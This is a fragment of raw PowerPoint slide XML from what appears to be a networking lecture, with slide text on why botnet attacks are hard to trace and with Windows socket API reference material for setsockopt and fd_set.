            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId45"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536" y="3588"/>
              <a:ext cx="3468" cy="10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p>
              <a:pPr marL="12700" marR="5080" algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="95"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr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Botnet</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2200" b="1" spc="-25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200" b="1" spc="-2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 </a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2200" b="1" spc="-1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(customer)</a:t>
              </a:r>
              <a:endParaRPr sz="22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object 46"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="5630" y="3898"/>
              <a:ext cx="9621" cy="5537"/>
              <a:chOff x="2006473" y="2643123"/>
              <a:chExt cx="5856605" cy="3370579"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="object 47"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId46"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7437501" y="5872162"/>
                <a:ext cx="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h="141604">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="141287"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:ln w="254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object 48"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId47"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2006473" y="2643123"/>
                <a:ext cx="368935" cy="717550"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="368935" h="717550">
                    <a:moveTo>
                      <a:pt x="368426" y="621791"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="342875" y="634567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349250" y="647318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323722" y="660146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291719" y="660146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368426" y="717550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368426" y="660146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323722" y="660146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317321" y="647344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368426" y="647344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368426" y="621791"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="368935" h="717550">
                    <a:moveTo>
                      <a:pt x="342875" y="634567"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="317321" y="647344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323722" y="660146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349250" y="647318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342875" y="634567"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="368935" h="717550">
                    <a:moveTo>
                      <a:pt x="25653" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="12826"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317321" y="647344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342875" y="634567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2565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object 49"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId48"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2287651" y="2689224"/>
                <a:ext cx="186055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86055" h="279400">
                    <a:moveTo>
                      <a:pt x="60451" y="173227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="180594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1500" y="188045"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3333" y="194960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23368" y="227584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62801" y="247062"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="249936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="279400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="279400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="249936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113510" y="249338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154104" y="235461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177342" y="209296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="209296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="207645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="207645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75818" y="204088"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70738" y="200151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67279" y="194945"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64643" y="190880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62230" y="183514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60451" y="173227"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="186055" h="279400">
                    <a:moveTo>
                      <a:pt x="183500" y="159258"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="104648" y="159258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114300" y="162687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120904" y="166624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127507" y="174751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129159" y="179324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129159" y="189864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="209296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177342" y="209296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185674" y="176149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184411" y="162292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183500" y="159258"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="186055" h="279400">
                    <a:moveTo>
                      <a:pt x="104648" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="82804" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="15494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65488" y="17494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27305" y="36067"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8824" y="80390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8710" y="83820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9209" y="92285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28035" y="129143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68756" y="148361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="152526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="207645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="207645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="159258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183500" y="159258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155957" y="121316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="101600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="95758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="95758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76454" y="93472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72009" y="90677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66929" y="83820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65659" y="79883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65659" y="70865"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66929" y="67055"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71881" y="60578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76326" y="57912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="55625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173797" y="55625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170608" y="48958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134254" y="20653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="15494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="186055" h="279400">
                    <a:moveTo>
                      <a:pt x="173797" y="55625"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="82804" y="55625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="95758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="95758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="56387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174161" y="56387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173797" y="55625"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="186055" h="279400">
                    <a:moveTo>
                      <a:pt x="174161" y="56387"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="104648" y="56387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109855" y="59309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113537" y="62229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117982" y="67945"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120523" y="73025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123317" y="80390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179069" y="71247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175619" y="59436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174161" y="56387"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FDA400"/>
              </a:solidFill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object 50"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId49"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2287651" y="2689224"/>
                <a:ext cx="186055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86055" h="279400">
                    <a:moveTo>
                      <a:pt x="104648" y="159258"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="104648" y="171737"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="184229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="196744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="209296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113156" y="207263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119380" y="203962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123317" y="199516"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127254" y="194945"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129159" y="189864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129159" y="184150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129159" y="179324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127507" y="174751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124206" y="170687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120904" y="166624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114300" y="162687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="159258"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="186055" h="279400">
                    <a:moveTo>
                      <a:pt x="82804" y="55625"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="76326" y="57912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71881" y="60578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69468" y="63753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66929" y="67055"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65659" y="70865"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65659" y="75184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65659" y="79883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="95758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="85754"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="75739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="65700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="55625"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="186055" h="279400">
                    <a:moveTo>
                      <a:pt x="82804" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="90043" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97409" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="5207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="10287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="15494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120433" y="17305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155956" y="32003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179069" y="71247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165161" y="73533"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151241" y="75819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137296" y="78105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123317" y="80390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120523" y="73025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117982" y="67945"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115824" y="65150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113537" y="62229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109855" y="59309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="56387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="67702"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="78994"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="90285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="101600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125529" y="107981"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165481" y="128270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184411" y="162292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185674" y="176149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185221" y="184459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170164" y="220345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135762" y="244855"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="249936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="257290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="264668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="272045"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="279400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97409" y="279400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90043" y="279400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="279400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="272045"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="264667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="257290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="249936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72278" y="248695"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34226" y="236077"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8000" y="207137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="180594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15071" y="178710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30178" y="176863"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45309" y="175039"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60451" y="173227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62230" y="183514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64643" y="190880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67691" y="195579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70738" y="200151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75818" y="204088"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="207645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="193907"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="180133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="166336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="152526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68756" y="148361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28035" y="129143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9209" y="92285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8636" y="82550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9802" y="69214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37762" y="27781"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="15494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="10287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="5207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="0"/>
                    </a:lnTo>
                    <a:close/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object 51"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId50"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6657975" y="3837050"/>
                <a:ext cx="1198880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198879" h="1508125">
                    <a:moveTo>
                      <a:pt x="0" y="233299"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="515874"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1198879" h="1508125">
                    <a:moveTo>
                      <a:pt x="0" y="939673"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1222248"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1198879" h="1508125">
                    <a:moveTo>
                      <a:pt x="589026" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="589026" y="212598"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1198879" h="1508125">
                    <a:moveTo>
                      <a:pt x="589026" y="609473"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="589026" y="820674"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1198879" h="1508125">
                    <a:moveTo>
                      <a:pt x="589026" y="1295273"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="589026" y="1508125"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1198879" h="1508125">
                    <a:moveTo>
                      <a:pt x="1198626" y="304673"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1198626" y="587248"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1198879" h="1508125">
                    <a:moveTo>
                      <a:pt x="1198626" y="1066673"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1198626" y="1349248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p>
                <a:endParaRPr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Botnets, the hardest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object 2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335280" y="1443990"/>
            <a:ext cx="11692890" cy="4727575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="135534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Determining the source of a botnet-based attack is challenging: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Every zombie host is an attacker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Botnets can exist in a benign state for an arbitrary amount of time before they are used for a specific attack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Traditional approach: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identify the C&amp;C server and disable it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 trend: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P2P networks,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128395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ü"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2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C&amp;C server anonymized among the other peers (zombies)</a:t>
            </a:r>
            <a:endParaRPr sz="2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Measuring the size of botnets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40995" y="1022350"/>
            <a:ext cx="3879850" cy="4959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/>
            <a:r>
              <a:rPr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Challenges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setsockopt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0" name="Text Box 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281305" y="4144645"/>
            <a:ext cx="11381105" cy="2008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 fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m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[in] s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 descriptor that identifies a socket.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 fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m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[in] level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The level at which the option is defined (for example, SOL_SOCKET).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 fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m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[in] optname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The socket option for which the value is to be set (for example, SO_BROADCAST). The optname parameter must be a socket option defined within the specified level, or behavior is undefined.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ext Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2007870" y="1156970"/>
            <a:ext cx="3429000" cy="2784475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F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int setsockopt(                                                       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 [in] SOCKET     s,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 [in] int        level,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 [in] int        optname,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 [in] const char *optval,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 [in] int        optlen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圆角矩形标注 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6346825" y="1682115"/>
            <a:ext cx="3837940" cy="1735455"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73411"/>
              <a:gd name="adj2" fmla="val -274"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="E74C3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Text Box 30" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030352c5c2274656d706c61746549645c223a32303233313537347d220a7d0a"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6347460" y="1811655"/>
            <a:ext cx="38373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-539750" algn="l" fontAlgn="auto">
              <a:buSzPct val="150000"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip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The setsockopt function sets a socket option.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fd_set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0" name="Text Box 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281305" y="4777105"/>
            <a:ext cx="11381105" cy="1019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 fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr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fd_count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1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The number of sockets in the set.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 fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr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fd_array[FD_SETSIZE]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26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An array of sockets that are in the set.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ext Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342265" y="1740535"/>
            <a:ext cx="4977130" cy="2399665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F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typedef struct fd_set {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</a:pP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 u_int  fd_count;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</a:pP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  SOCKET fd_array[FD_SETSIZE];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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>} fd_set, FD_SET, *PFD_SET, *LPFD_SET;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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圆角矩形标注 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5642610" y="1307465"/>
            <a:ext cx="6208395" cy="3265805"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
